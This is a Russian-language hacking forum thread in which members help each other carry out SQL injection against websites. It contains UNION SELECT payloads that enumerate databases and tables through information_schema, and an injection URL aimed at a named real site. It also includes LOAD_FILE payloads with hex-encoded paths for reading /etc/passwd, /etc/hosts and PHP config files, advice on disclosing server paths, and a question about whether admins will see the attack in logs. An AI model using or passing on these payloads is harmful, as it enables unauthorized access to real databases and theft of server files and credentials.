Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    а теперь подумай
     
    3 people like this.
  2. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    Как выести ВСЕ базы данных, кроме текущей?
    Работаю с 5 веткой)
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,255
    Likes Received:
    1,147
    Reputations:
    886
    select+group_concat(table_schema)+from+information_schema.tables
     
    _________________________
    1 person likes this.
  4. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Konqi:
    или
    select+group_concat(schema_name)+from+information_schema.schemata
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,255
    Likes Received:
    1,147
    Reputations:
    886

    спасибо
     
    _________________________
  6. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    select+database()+limit+...
     
    _________________________
  7. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    129
    Likes Received:
    9
    Reputations:
    1
    Хотел бы узнать любую инфу по чтению файлов через sql-inj. кто может просвятить?
     
  8. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    232
    Likes Received:
    89
    Reputations:
    27
    через LOAD_FILE
     
  9. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    129
    Likes Received:
    9
    Reputations:
    1
    Развернутый ответ. я знаю про эту комманду, но что то в самый ответсвенный момент она не заработала. про фаил прив я тоже знаю. интересует в каком виде казывается путь до файла - site.ru/config.php так?
     
  10. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    При load_file надо указывать полный путь к файлу, нет, не с доменом, а путь на самом серваке... Т.е. тебе надо раскрыть пути, если есть вывод ошибок, то пути сами вылезут, если же нет, то можно найти в /etc/passwd (сначала попробуй его прочитать, если не знаешь, как определить есть ли file_priv). И не забывай про МК, надо пути кодировать. Еще вариант найти полный путь до сервака проиндклюдить httpd.conf
     
    1 person likes this.
  11. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    В этой статье есть самое необходимое:
    https://forum.antichat.ru/threadnav43966-1-10.html

    ну и тут немного:
    https://forum.antichat.ru/thread104591.html
     
    2 people like this.
  12. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    есть несколько баз. (5 ветка)
    есть офигеть, сколько полей и столбцов.
    выбрал одно поле и вывел оттуда все названия столбцов.
    А теперь как узнать какое поле к какой БД принадлежит. ?
    Возможно это без тупого перебора?))
     
  13. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    jecka3000 Без лимита нереально...

    тут все поля к одной и той же БД
     
  14. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    942
    Likes Received:
    428
    Reputations:
    139
    Используй table_schema.

    Взял для примера скуль с соседней темы и добавил туда табл схему:

    http://www.ry7.ru/index.php?s=-58+union+select+group_concat(0x0b,TABLE_NAME,0x3a,table_schema)+from+information_schema.tables--

    Теперь будет выводится и название БД, к которой эта таблица относится. Так же точно и с колонками.
     
    #13174 Ins3t, 26 May 2010
    Last edited: 26 May 2010
    2 people like this.
  15. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    9
    Reputations:
    1
    не могу считывать файлы, подскажите
    права вроде есть
    root'@'localhost' | FILE | YES

    USER() - возвращает что я под root@localhost
    VERSION() - 5.0.51a-3ubuntu5.5

    кавычки фильтруются по этому кодирую
    к примеру
    etc/passwd >>> 0x6574632f706173737764

    делаю такую вот инъекцию
    ... where 1=2 union select LOAD_FILE(0x6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
    но в результате приходит пустая строка.
    файл пытаюсь открыть по пути который мне возвращается в ошибке, типа:
    /usr/local/nginx/....../index.php

    что я делаю не так?
     
  16. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Вообще то не всегда на /etc/passwd есть права ога?
    ВО вторых читай index.php лучше, там доберёшься до конфигов.
     
  17. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    1. /etc/passwd
    2.
    Code:
    ...where 1=2 union select LOAD_FILE(0x6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
    выглядит странновато как-то
    по
    Code:
    ...where 1=2 union select 123123123,2,3,4,5,6,7,8 limit 0,100#
    выводит 123123123 ?
     
  18. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    9
    Reputations:
    1
    ну мне /etc/passwd и не нужен, это я для примера привёл, т.к. путь короткий, хотя тоже ни чего не возвращает
    мне нужен именно php файл
    в результате ошибки возвращается такой текс
    mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ] mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
    /usr/local/nginx/html/..путь до файла .php



    да


    и еще вопрос.. ошибки sql куда нибудь логируются? админ потом все тексты ошибочных sql увидит, или только сам факт ошибки
     
  19. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    zuzzz:

    1. надо указывать не etc/passwd, а /etc/passwd, следовательно твой запрос принимает следующий вид
    Code:
    where 1=2 union select LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
    
    вряд ли это тебе поможет, так как ты пробовал другие пути (/usr/local/nginx/....../index.php), но на будущее

    2. у меня вопрос: зачем ты при запросе с LOAD_FILE используешь limit ..,..?

    3. если тебе возвращается пустая строка, то либо у тебя нет прав на чтение, либо такой файл не существует. Попробуй системные файлы такие как: /etc/hosts, /etc/issue, а также другие скрипты твоего сайта, полный путь к которым ты знаешь.

    4. насчет логирования sql ошибок не скажу, но если ты юзаешь GET-запросы, то в error.log и access.log будет все видно
     
    1 person likes this.
  20. Анжелика

    Анжелика Elder - Старейшина

    Joined:
    25 Mar 2008
    Messages:
    25
    Likes Received:
    36
    Reputations:
    -4
    в 95% случаев есть :(
    Всегда есть на /etc/hosts, его лучше читать
     
Loading...
Thread Status:
Not open for further replies.